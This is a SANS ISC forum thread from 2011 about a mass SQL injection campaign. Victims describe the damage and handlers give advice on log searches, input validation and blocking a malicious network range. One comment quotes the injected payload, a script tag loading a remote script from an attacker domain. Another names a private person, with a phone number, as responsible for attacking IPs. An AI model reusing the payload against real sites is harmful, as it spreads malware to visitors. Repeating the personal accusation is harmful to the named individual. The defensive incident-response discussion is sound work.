Threat Level: green Handler on Duty: Manuel Humberto Santander Pelaez

SANS ISC: SQL Injection Attack happening ATM SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network
https://isc.sans.edu/honeypot.html

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
SQL Injection Attack happening ATM
@Sigrid Wen

ATM=At the moment

...
fmc

5 Posts
Hey All,
The pakage is quite vicious. For text fields large enough, the injection string is cleanable but for small text based fields, the injection will wipe out all content in the field.
Double check that your full backups/transactions are running as that is the only recovery if you get hit.
Anonymous
I spent 15hours fixing my client website 3 days ago only to have the same thing happen again today.

"></title><script src="http://lilupophilupop.com/sl.php"></script><!-- inserted into every table column. What can i do a prevent this, i just blocked the domain name but i still don`t feel safe
Anonymous
The reason of the problem remains not clear to me.
Who can explain please:
1. Is it a vulnerability in MSSQL server or simple SQL injection - bug in website sources?
2. As far as I understand now it is vulnerability in MSSQL server - so do they plan to release a patch?
Anonymous
@Andy - Unfortunately you will need to go through your log files and try and identify the actual page that has been used to inject. search your web logs for 736574 or any request that is quite long. I also look for 500 error messages as there is a likelihood that the SQLinjection caused the server to have a little fit and throw a 500 error. To look for long entries I used awk ( cat filename | awk {'if(length($0)>1500) { print $0}'} )

Then once you have identified it you will need to look what in the page is making it vulnerable and fix the code. A simple length check is a good start, but proper validation is the only way you will address this issue.

Mark
Mark

391 Posts
ISC Handler
@grep
1. Is it a vulnerability in MSSQL server or simple SQL injection - bug in website sources?
--- It is not a vulnerability in the actual server, it is an issue with the code on the page or in the backend (some compromised sites were using stored procedures). Basic validation of input will fix the problem.

2. As far as I understand now it is vulnerability in MSSQL server - so do they plan to release a patch?
--- As mentioned above it is an issue with the code, not the product. Just as a word of caution, just because the incidents I am aware of were MSSQL related does not mean that this is limited to MSSQL. It is very possible that other products are being attacked I just haven't had anyone say "my insert fav DB product" has been affected.

Mark H
Mark

391 Posts
ISC Handler
Mark, thank you!
Could you please advise
a) how to find the place in the code where exactly vulnerability exists?
b) what exactly should be validated on the input?
Mark
3 Posts
a) more exactly - I mean how to find specific page/input where vulnerability exists?
Mark
3 Posts
@Grep
I just updated the diary entry with some additional info. If that doesn't help you, zip up the log file for the day of the compromise and send it to markh.isc at gmail.com or put it somewhere where I can download it from and I'll take a quick look.

M
Mark

391 Posts
ISC Handler
@Grep
i think it would be a page with a form on it or a page that uses a query string.
Mark
2 Posts
@Andy

- https://blogs.msdn.com/themes/blogs/generic/post.aspx?WeblogApp=alexhomer&y=2011&m=02&d=06&WeblogPostName=blocking-malware-domains-in-isa-2006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will not be blocked when you use just domain name lists..."

Most of the time, the morons calm it down just a bit until the dust settles.
Not the case here:
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-09, and the last time suspicious content was found was on 2011-12-09... Over the past 90 days, we found [u]15[/u] site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com... that appeared to function as intermediaries for the infection of [u]160[/u] other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found [u]21[/u] site(s), including, for example, sweepstakesandcontestsnow .com/, that infected [u]761[/u] other site(s)..."
. [ 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) ]
.
Jack

160 Posts
Updated: Diagnostic page for AS:48691 (SPECIALIST)
- http://google.com/safebrowsing/diagnostic?site=AS:48691
"... The last time Google tested a site on this network was on 2011-12-11, and the last time suspicious content was found was on 2011-12-11... Over the past 90 days,we found -15- site(s) on this network, including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com, that appeared to function as intermediaries for the infection of -190- other site(s)... We found -30- site(s), including, for example, lilupophilupop .com, sweepstakesandcontestsinfo .com, sweepstakesandcontestsnow .com, that infected -2122- other site(s)..."
- http://blog.dynamoo.com/2010/10/evil-netwo...specialist.html
11 October 2010 - "...blocking 194.28.112.0 - 194.28.115.255 (194.28.112.0/22) is probably a good idea..."
inetnum: 194.28.112.0 - 194.28.115.255
descr: Specialist
- https://blogs.msdn.com/themes/blogs/generic/post.aspx?WeblogApp=alexhomer&y=2011&m=02&d=06&WeblogPostName=blocking-malware-domains-in-isa-2006&GroupKeys=
"... malware that connects using an IP address instead of a domain name will -not- be blocked when you use just domain name lists..."
.
Jack

160 Posts
Noticed that rogersplus.ca has been hit by this. over 2040 hits for hXXp://lilupophilupop.com/sl.php within the domain.
Though appears the link is now returning a 404 error.
Jack
1 Posts
Wanted to let everyone know that I found 3 more unique IPs in my IIS logs today after finding over 50 SQL injection attempts for these troublemakers.

They are:
173.212.195.36
173.212.213.36
66.197.227.136

And FYI, the string posted above by Mark H. is what helped me find them. So thank you.

My only other question is why isn't anyone showing up on the doorstep of S. Matthew Arcus in Scranton, PA, phone 570-343-8551. ARIN says that all three of the above IP addresses belong to him?
Jack
1 Posts
Just an FYI that I linked to this page in a blog post: What an IDS analyst does..(for non-geeks). Any feedback appreciated. It is http://idstales.ca/stories.php
Jack
1 Posts
We were infected with this attack twice.

The first occurrence was on 12/08/11 and somewhat surprisingly, we could find no record of the attack point in the IIS access logs.

The second occurrence was on 12/13/11 and in that instance, we did find the entry point in the logs with the signature mentioned in this report.

We then “replayed” the injection in a secure test environment and what we found in our case was that the SQL statement it runs can take hours to actually complete. Until the SQL statement completes, IIS was waiting to write the entry to the access log because it didn’t have a response yet.

Our theory is that in the first attack, we saw evidence of the database corruption while the SQL was still running and promptly shut down IIS and then SQL Server, causing no log entry to be written into the IIS access logs. During the second attack, we also found evidence of the corruption very quickly, but in that instance, SQL Server was shut down before IIS and therefore IIS was able to log the entry in the access logs.

Our second attack was from the 173.212.195.36 IP mentioned in a previous comment as being registered to the guy in Scranton, PA.
Jack
1 Posts

Sign Up for Free or Log In to start participating in the conversation!